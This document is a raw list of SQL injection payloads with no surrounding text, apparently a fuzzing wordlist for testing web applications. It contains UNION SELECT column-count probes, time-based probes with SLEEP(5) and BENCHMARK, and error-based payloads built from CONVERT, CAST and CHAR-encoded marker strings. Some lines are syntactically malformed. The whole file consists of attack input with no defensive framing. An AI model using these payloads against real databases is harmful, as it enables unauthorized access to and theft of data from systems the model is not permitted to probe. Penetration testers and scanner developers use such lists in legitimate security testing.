UNION ALL SELECT 1,2,3,4,5--
UNION ALL SELECT 1,2,3,4,5,6--
UNION ALL SELECT 1,2,3,4,5,6,7--
UNION ALL SELECT 1,2,3,4,5,6,7,8--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
UNION SELECT @@VERSION,SLEEP(5),3
UNION SELECT @@VERSION,SLEEP(5),USER(),4
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION SELECT @@VERSION,SLEEP(5),"'3
UNION SELECT @@VERSION,SLEEP(5),"'3'"#
UNION SELECT @@VERSION,SLEEP(5),USER(),4#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
UNION ALL SELECT USER()--
UNION ALL SELECT SLEEP(5)--
UNION ALL SELECT USER(),SLEEP(5)--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5)--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT NULL--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))--
UNION ALL SELECT NULL#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#
UNION ALL SELECT NULL
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)
AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL--
UNION ALL SELECT 'INJ'||'ECT'||'XXX'
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11
